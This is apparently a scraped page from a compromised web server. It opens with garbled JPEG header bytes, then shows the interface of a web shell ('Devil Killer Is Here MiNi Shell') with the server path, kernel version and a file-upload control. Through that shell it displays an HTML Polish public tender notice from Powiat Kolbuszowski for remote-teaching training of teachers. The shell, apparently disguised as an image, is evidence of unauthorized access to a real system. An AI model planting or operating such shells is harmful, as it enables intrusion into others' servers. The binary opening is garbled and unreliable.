JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220317/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220317/0008925002-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przepr. usł.szkol. w zakr.Prowadz.zaj. na odległ.–eduk.zdalnej z wykorz. Platf. GoogleClassroom oraz e-podręczn. dla naucz. zZesp.Szk.Tech. zKolb. oraz Zesp.Szk.Agrotechn.-Ekon. wWeryni wr.szk.2021/22 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Kolbuszowski</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581382</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">11 Listopada 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">172275880</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 2271523</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@kolbuszowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat.kolbuszowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przepr. usł.szkol. w zakr.Prowadz.zaj. na odległ.–eduk.zdalnej z wykorz. Platf. GoogleClassroom oraz e-podręczn. dla naucz. zZesp.Szk.Tech. zKolb. oraz Zesp.Szk.Agrotechn.-Ekon. wWeryni wr.szk.2021/22 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9a52d45f-a532-11ec-80f8-1ad70aec7fa4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00089250</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00032661/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Przeprowadzenie usługi szkoleniowej w zakresie w zakresie edukacji zdalnej dla 102 nauczycieli z ZST z Kolbuszowej oraz ZSEA w Weryni w roku szkolnym 2021/2022.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> współfinansowany ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Działanie 9.4 Poprawa jakości kształcenia zawodowego, Priorytet IX Jakość edukacji i kompetencji w regionie na podstawie Umowy o dofinansowanie projektu z dnia 29 kwietnia 2021. w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014- 2020. Numer umowy RPPK.09.04.00-18-0006/20-00 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Zawiadomienia, oświadczenia,<br/>wnioski lub informacje Wykonawcy przekazują:<br/>a. drogą elektroniczną: na adres mailowy przetargi@kolbuszowski.pl oraz<br/>b. przy użyciu miniPortalu dostępnego pod adresem https://miniportal.uzp.gov.pl/, ePUAPu dostępnego<br/>pod adresem https://epuap.gov.pl/wps/portal z zastrzeżeniem, iż oferta Wykonawcy wraz z<br/>załącznikami przekazywana jest tylko przy użyciu ePUAPu za pośrednictwem dedykowanego<br/>“Formularza do złożenia, zmiany, wycofania oferty lub wniosku.”<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: “Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do “Formularza do komunikacji.”</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w „Warunkach korzystania z elektronicznej platformy usług administracji publicznej ePUAP” oraz w „Regulaminie korzystania z systemu miniPortal”.<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi <br/>https://miniportal.uzp.gov.plInstrukcjaUzytkownikaSystemuMiniPortalePUAP.pdf<br/>https://epuap.gov.pl/wps/portal/strefa-klienta/regulamin<br/>4. Wykonawca, który chce złożyć ofertę powinien zapoznać się z aktualnymi wytycznymi technicznymi zawartymi w ww. regulaminach. Wykonawca składający ofertę akceptuje instrukcje użytkownika, regulamin systemu miniPortal i warunki korzystania ePUAP I uznaje je za wiążące.<br/>5. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy. “Formularz złożenia, zmiany, wycofania oferty lub wniosku” do “Formularza do komunikacji” wynosi 150 MB.<br/>7. ID postępowania dla niniejszego postępowania o udzielenie zamówienia jest dostępny na Liście<br/>wszystkich postępowań na miniPortalu.<br/>1. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w formacie danych: .pdf,<br/>.doc, .docx, .rtf,.xps, .odt i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym<br/>lub podpisem osobistym. Zamawiający nie rekomenduje podpisu elektronicznego zewnętrznego<br/>(XAdES +doc)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest: Starosta Kolbuszowski, ul. 11-go Listopada 10;<br/>36-100 Kolbuszowa;<br/>2) inspektorem ochrony danych osobowych w: Starostwo Powiatowe w Kolbuszowej,<br/>ul. 11-go Listopada 10; 36-100 Kolbuszowa jest: P. Konrad Śliwa; iod@kolbuszowski.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego: Przeprowadzenie usługi<br/>szkoleniowej w zakresie podniesienia kompetencji i kwalifikacji zawodowych 40 uczniów z Zespołu<br/>Szkół Technicznych z Kolbuszowej oraz 52 uczniów z Zespołu Szkół Agrotechniczno-Ekonomicznych<br/>w Weryni w roku szkolnym 2021/2022 prowadzonym w trybie .podstawowym bez negocjacji<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o przepisy ustawy z dnia 11 września 2019 r.. – Prawo<br/>zamówień publicznych ( dalej „ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane:<br/>a. przez okres 2 lat od dnia 31 grudnia roku następującego po złożeniu do Komisji Europejskiej<br/>zestawienia wydatków, w którym ujęto ostatnie wydatki dotyczące Projektu. Instytucja Zarządzająca<br/>poinformuje Beneficjenta o dacie rozpoczęcia okresu, o którym mowa w zdaniu pierwszym. Okres, o którym mowa w zdaniu pierwszym, zostaje przerwany w przypadku wszczęcia postępowania<br/>administracyjnego lub sądowego dotyczącego wydatków rozliczonych w Projekcie albo na należycie<br/>uzasadniony wniosek Komisji Europejskiej, o czym Beneficjent jest informowany pisemnie;<br/>b. w przypadku dokumentów dotyczących pomocy publicznej lub pomocy de minimis - przez okres 10<br/>lat, licząc od dnia jej przyznania, o ile Projekt dotyczy pomocy publicznej lub pomocy de minimis;<br/>c. w przypadku dokumentów dotyczących podatku od towarów i usług - przez okres, o którym mowa w<br/>ustawie z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2017 r., poz. 1221, z późn.<br/>zm.);<br/>d. przez okres trwałości Projektu tj. 5 lat liczonym od daty przekazania Beneficjentowi przez Instytucję<br/>Zarządzającą płatności końcowej na rzecz Projektu (wypłaty salda końcowego) tj. od dnia obciążenia<br/>rachunku bankowego, z zastrzeżeniem zasad wynikających z pomocy państwa. W przypadku braku<br/>wypłaty płatności końcowej ww. okres liczony jest od dnia zatwierdzenia wniosku o płatność końcową.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>cd opisu punku nizej</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">cd opisu z punktu wyżej<br/>9) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego<br/>administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony<br/>danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.272.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Nazwa zadania: Przeprowadzenie usługi szkoleniowej w zakresie „Prowadzenia zajęć na odległość – edukacji zdalnej” z wykorzystaniem platformy Google Classroom oraz e-podręczników dla nauczycieli z Zespołu Szkół Technicznych z Kolbuszowej oraz z Zespołu Szkół Agrotechniczno-Ekonomicznych w Weryni w roku szkolnym 2021/2022.<br/>Źródła finansowania: Projekt „Powiat Kolbuszowski stawia na kształcenie zawodowe” współfinansowany ze środków Europejskiego Funduszu Społecznego realizowanego w ramach Działanie 9.4 Poprawa jakości kształcenia zawodowego, Priorytet IX Jakość edukacji i kompetencji <br/>w regionie na podstawie Umowy o dofinansowanie projektu z dnia 29 kwietnia 2021. w ramach Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2014-2020. <br/>Numer umowy RPPK.09.04.00-18-0006/20-00<br/><br/>Zamówienie nie jest podzielone na części. <br/>Maksymalna liczba uczestników 102 osoby. ilość grup szkoleniowych: 5, liczebność grup 20-21 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80530000-8 - Usługi szkolenia zawodowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę na podstawie kryteriów<br/>oceny ofert określonych<br/>w dokumentach zamówienia.<br/>a. Nazwa kryterium: cena brutto<br/>Waga kryterium: 60 %<br/>Opis sposobu obliczenia punktów:<br/>C= C min/ C bad X 60 % X100<br/>gdzie<br/>C min cena ofertowa brutto oferty najtańszej<br/>C bad cena ofertowa brutto oferty badanej<br/>W tym kryterium można uzyskać maksymalnie 60 punktów (1%=1 pkt). Przyznane punkty zostaną<br/>zaokrąglone do dwóch miejsc po przecinku.<br/>Jeżeli złożono ofertę, której wybór prowadziłby do powstania u zamawiającego obowiązku<br/>podatkowego zgodnie z przepisami o podatku od towarów i usług, zamawiający w celu oceny takiej<br/>oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek<br/>rozliczyć zgodnie z tymi przepisami. Wykonawca, składając ofertę, informuje zamawiającego, czy<br/>wybór oferty będzie prowadzić do powstania u zamawiającego obowiązku podatkowego, wskazując<br/>nazwę (rodzaj) towaru lub usługi, których dostawa lub świadczenie będzie prowadzić do jego<br/>powstania, oraz wskazując ich wartość bez kwoty podatku.<br/>b. Nazwa kryterium: doświadczenie osoby skierowanej przez Wykonawcę do realizacji zamówienia<br/>Waga kryterium: 40 %<br/>Opis sposobu obliczenia punktów:<br/>Wykonawca zadeklaruje doświadczenie osoby skierowanej przez Wykonawcę do realizacji zamówienia.<br/>Oferta może otrzymać maksymalnie 40 pkt (1%=1pkt) w kryterium doświadczenie osoby skierowanej przez Wykonawcę do realizacji zamówienia, przy czym:<br/>1) Za skierowanie do realizacji zamówienia trenera/szkoleniowca który w ostatnich trzech latach przeprowadził co najmniej 7 kursów i więcej o tematyce tożsamej lub podobnej z minimalnym zakresem kursu na które Wykonawca składa ofertę (podanym w tabeli „Wykazu usług zawodowych”) - 40 pkt<br/>2) Za skierowanie do realizacji zamówienia trenera/szkoleniowca który w ostatnich trzech latach przeprowadził co najmniej 5 kursów o tematyce tożsamej lub podobnej z minimalnym zakresem kursu na które Wykonawca składa ofertę (podanym w tabeli „Wykaz usług zawodowych” )- 20 pkt<br/>3) Za skierowanie do realizacji zamówienia trenera/szkoleniowca który w ostatnich trzech latach przeprowadził co najmniej 3 kursy o tematyce tożsamej lub podobnej z minimalnym zakresem kursu na które Wykonawca składa ofertę (podanym w tabeli „Wykaz usług zawodowych” )- 0 pkt<br/>Oferty z doświadczeniem osoby skierowanej przez Wykonawcę do realizacji zamówienia mniejszym niż 3 kusy o których, mowa powyżej będą traktowane jako nie spełniające warunków zamówienia i zostaną odrzucone.<br/>Najkorzystniejsza oferta w odniesieniu do tego kryterium może uzyskać maksymalnie 40 punktów.<br/>W przypadku błędnego wypełnienia oferty w zakresie doświadczenia osoby skierowanej przez Wykonawcę do realizacji zamówienia, np. brak wskazania w/w doświadczenia, oferta otrzyma 0 pkt w<br/>kryterium „doświadczenia osoby skierowanej przez Wykonawcę do realizacji zamówienia”, a jako deklarowane doświadczenie zostanie przyjęte 3 kursy.<br/>Łączna liczba punktów za ofertę = liczba punktów w kryterium cena brutto + liczba punktów w kryterium doświadczenie osoby skierowanej przez Wykonawcę do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie osoby skierowanej przez Wykonawcę do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Warunek zdolności do występowania w obrocie gospodarczym – wpis do odpowiedniego rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowym zakresie.<br/>2)	Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej – zezwolenia, licencje, koncesje lub wpis do rejestru.<br/>Podmiot realizujący usługę musi posiadać wpis do Rejestru Instytucji Szkoleniowych.<br/>3)	Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>Zamawiający nie precyzuje warunków w przedmiotowym zakresie.<br/>4)	Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału technicznego. Wykonawca spełnia ten warunek udziału w postępowaniu, jeżeli:<br/><br/>a.	dysponuje kadrą techniczną posiadającą uprawnienia i kwalifikacje tj: Wykonawca dysponuje lub będzie dysponować na etapie realizacji zamówienia osobami, zdolnymi do wykonania zamówienia o kwalifikacjach zawodowych, uprawnieniach, doświadczeniu i wykształceniu niezbędnym do wykonania zamówienia wskazanymi poniżej:<br/>a)	Trener/szkoleniowiec – co najmniej jedna osoba:<br/><br/>Trener/szkoleniowiec musi posiadać min. wykształcenie średnie i następujące doświadczenie w prowadzeniu kursów zawodowych:: w ciągu ostatnich trzech lat przeprowadził co najmniej 3 kursy o tematyce tożsamej lub podobnej z minimalnym zakresem kursu ( podanym w tabeli „ WYKAZ USŁUG ZAWODOWYCH”). <br/>Powyższe wymagania muszą być spełnione łącznie dla każdego trenera, który realizował będzie szkolenia zawodowe objęte opisem przedmiotu zamówienia. <br/><br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający żąda następujących podmiotowych środków dowodowych: Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>/wzór wykazu osób stanowi załącznik nr 1d -Rozdział I SWZ/<br/><br/><br/>Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału <br/>w postępowaniu, kwoty będą wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg 